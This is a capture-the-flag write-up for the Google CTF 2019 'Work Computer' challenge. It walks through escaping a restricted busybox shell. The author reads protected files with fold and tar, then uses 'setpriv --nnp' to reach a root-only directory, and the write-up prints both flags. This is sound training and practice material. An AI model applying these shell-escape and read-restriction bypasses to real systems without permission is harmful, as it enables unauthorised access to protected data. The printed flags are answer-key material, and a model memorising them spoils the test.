Google CTF 2019
Work Computer
With the confidence of conviction and decision making skills that made you a contender for Xenon’s Universal takeover council, now disbanded, you forge ahead to the work computer. This machine announces itself to you, surprisingly with a detailed description of all its hardware and peripherals. Your first thought is “Why does the display stand need to announce its price? And exactly how much does 999 dollars convert to in Xenonivian Bucklets?” You always were one for the trivialities of things. Also presented is an image of a fascinating round and bumpy creature, labeled “Cauliflower for cWo” – are “Cauliflowers” earthlings? Your 40 hearts skip a beat – these are not the strange unrelatable bipeds you imagined earthings to be.. this looks like your neighbors back home. Such curdley lobes. Will it be at the party? SarahH, who appears to be a programmer with several clients, has left open a terminal. Oops. Sorry clients! Aliens will be poking around attempting to access your networks.. looking for Cauliflower. That is, *if* they can learn to navigate such things.
readme.ctfcompetition.com 1337
You can find my all CTF solution in here
I connect to readme.ctfcompetition.com 1337 with using nc command.
1 |
nc readme.ctfcompetition.com 1337 |
This opens a unix terminal and current directory have README.flag and ORME.flag files. I couldn’t open this file with using nano, vim, cat, strings, file. These commands doesn’t works. After that I search file read commands in https://gtfobins.github.io/ web-site. I figure out the fold command. When I try to call fold command, it works.
1 2 |
fold -w10000 README.flag CTF{4ll_D474_5h4ll_B3_Fr33} |
I find the flags. But when, I try to open ORME.flag, I saw the permission denied message.
1 2 |
fold -w10000 ORME.flag fold: ORME.flag: Permission denied |
So that, this question have also different way to solve.
When I search a little bit, I saw bin folder. That files include binaries. I try to find familiar binaries. Tar is one of the familiar binaries for me. When I try to tar;
1 2 |
tar c README.flag README.flag0000400000247200024720000000003413507124515010416 0ustar 13381338CTF{4ll_D474_5h4ll_B3_Fr33} |
I find the flag but still I couldn’t open ORME.flag
1 2 3 |
tar c ORME.flag tar: can't open 'ORME.flag': Permission denied tar: error exit delayed from previous errors |
I need root permission.
I search the folders and I notice that message when I try to open challenge_setup folder in svr folder
1 2 3 4 5 6 |
> cd ../srv/ > ls challenge_setup > cd challenge_setup error: Permission denied > |
It can be related to ORME.flag
In the bin file when I use ls -la command
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 |
ls -la total 808 drwxr-xr-x 2 65534 65534 4096 Jun 13 14:28 . drwxr-xr-x 20 0 0 4096 Jun 13 14:28 .. lrwxrwxrwx 1 65534 65534 12 May 9 20:49 arch -> /bin/busybox -rwxr-xr-x 1 65534 65534 796240 Jan 24 07:45 busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 chgrp -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 chown -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 conspy -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 date -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 df -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 dmesg -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 dnsdomainname -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 dumpkmap -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 echo -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 false -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 fdflush -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 fsync -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 getopt -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 hostname -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 ionice -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 iostat -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 ipcalc -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 kill -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 login -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 ls -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 lzop -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 makemime -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 mkdir -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 mknod -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 mktemp -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 mount -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 mountpoint -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 mpstat -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 netstat -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 nice -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 pidof -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 ping -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 ping6 -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 pipe_progress -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 printenv -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 ps -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 pwd -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 reformime -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 rm -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 rmdir -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 run-parts -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 setpriv -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 setserial -> /bin/busybox -r-sr-xr-x 1 1338 1338 19936 Jun 13 12:48 shell lrwxrwxrwx 1 65534 65534 12 May 9 20:49 sleep -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 stat -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 stty -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 sync -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 tar -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 true -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 umount -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 uname -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 usleep -> /bin/busybox lrwxrwxrwx 1 65534 65534 12 May 9 20:49 watch -> /bin/busybox |
I figure out every binaries call busybox binary. When I call it,
1 2 |
> busybox busybox can not be called for alien reasons. |
Also I figure out thr setpriv binaries.
1 2 3 4 5 6 7 8 9 10 11 |
setpriv BusyBox v1.29.3 (2019-01-24 07:45:07 UTC) multi-call binary. Usage: setpriv [OPTIONS] PROG [ARGS] Run PROG with different privilege settings -d,--dump Show current capabilities --nnp,--no-new-privs Ignore setuid/setgid bits and file capabilities --inh-caps CAP,CAP Set inheritable capabilities --ambient-caps CAP,CAP Set ambient capabilities |
I can call binaries which is needed root permision binaries, with using setpriv.
YESSS
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 |
setpriv --nnp busybox BusyBox v1.29.3 (2019-01-24 07:45:07 UTC) multi-call binary. BusyBox is copyrighted by many authors between 1998-2015. Licensed under GPLv2. See source distribution for detailed copyright notices. Usage: busybox [function [arguments]...] or: busybox --list[-full] or: busybox --install [-s] [DIR] or: function [arguments]... BusyBox is a multi-call binary that combines many common Unix utilities into a single executable. Most people will create a link to busybox for each function they wish to use and BusyBox will act like whatever it was invoked as. Currently defined functions: [, [[, acpid, add-shell, addgroup, adduser, adjtimex, arch, arp, arping, ash, awk, base64, basename, bbconfig, beep, blkdiscard, blkid, blockdev, brctl, bunzip2, bzcat, bzip2, cal, cat, chgrp, chmod, chown, chpasswd, chroot, chvt, cksum, clear, cmp, comm, conspy, cp, cpio, crond, crontab, cryptpw, cut, date, dc, dd, deallocvt, delgroup, deluser, depmod, df, diff, dirname, dmesg, dnsdomainname, dos2unix, du, dumpkmap, dumpleases, echo, ed, egrep, eject, env, ether-wake, expand, expr, factor, fallocate, false, fatattr, fbset, fbsplash, fdflush, fdformat, fdisk, fgrep, find, findfs, flock, fold, free, fsck, fstrim, fsync, fuser, getopt, getty, grep, groups, gunzip, gzip, halt, hd, hdparm, head, hexdump, hostid, hostname, hwclock, id, ifconfig, ifdown, ifenslave, ifup, init, inotifyd, insmod, install, ionice, iostat, ip, ipaddr, ipcalc, ipcrm, ipcs, iplink, ipneigh, iproute, iprule, iptunnel, kbd_mode, kill, killall, killall5, klogd, less, link, linux32, linux64, ln, loadfont, loadkmap, logger, login, logread, losetup, ls, lsmod, lsof, lspci, lsusb, lzcat, lzma, lzop, lzopcat, makemime, md5sum, mdev, mesg, microcom, mkdir, mkdosfs, mkfifo, mkfs.vfat, mknod, mkpasswd, mkswap, mktemp, modinfo, modprobe, more, mount, mountpoint, mpstat, mv, nameif, nanddump, nandwrite, nbd-client, nc, netstat, nice, nl, nmeter, nohup, nologin, nproc, nsenter, nslookup, ntpd, od, openvt, partprobe, passwd, paste, patch, pgrep, pidof, ping, ping6, pipe_progress, pkill, pmap, poweroff, powertop, printenv, printf, ps, pscan, pstree, pwd, pwdx, raidautorun, rdate, rdev, readahead, readlink, readprofile, realpath, reboot, reformime, remove-shell, renice, reset, resize, rev, rfkill, rm, rmdir, rmmod, route, run-parts, sed, sendmail, seq, setconsole, setfont, setkeycodes, setlogcons, setpriv, setserial, setsid, sh, sha1sum, sha256sum, sha3sum, sha512sum, showkey, shred, shuf, slattach, sleep, smemcap, sort, split, stat, strings, stty, su, sum, swapoff, swapon, switch_root, sync, sysctl, syslogd, tac, tail, tar, tee, test, time, timeout, top, touch, tr, traceroute, traceroute6, true, truncate, tty, ttysize, tunctl, udhcpc, udhcpc6, umount, uname, unexpand, uniq, unix2dos, unlink, unlzma, unlzop, unshare, unxz, unzip, uptime, usleep, uudecode, uuencode, vconfig, vi, vlock, volname, watch, watchdog, wc, wget, which, whoami, whois, xargs, xxd, xzcat, yes, zcat |
Finally I can call busybox. and it also have cat binary. Tar is fine 🙂
1 2 3 4 5 |
setpriv --nnp tar c challenge_setup challenge_setup/0000500000000000000000000000000013500443047011232 5ustar 00challenge_setup/this_directory_is_not_part_of_the_challenge0000400000000000000000000000015113500133165022133 0ustar 00This directory is not part of the challenge. Seriously. It's just needed for some setup. Use /challenge. challenge_setup/README.flag0000400000000000000000000000003413475465777013052 0ustar 00CTF{4ll_D474_5h4ll_B3_Fr33} challenge_setup/ORME.flag0000400000000000000000000000004113475465777012655 0ustar 00CTF{Th3r3_1s_4lw4y5_4N07h3r_W4y} |
FLAGS:
CTF{4ll_D474_5h4ll_B3_Fr33}
CTF{Th3r3_1s_4lw4y5_4N07h3r_W4y}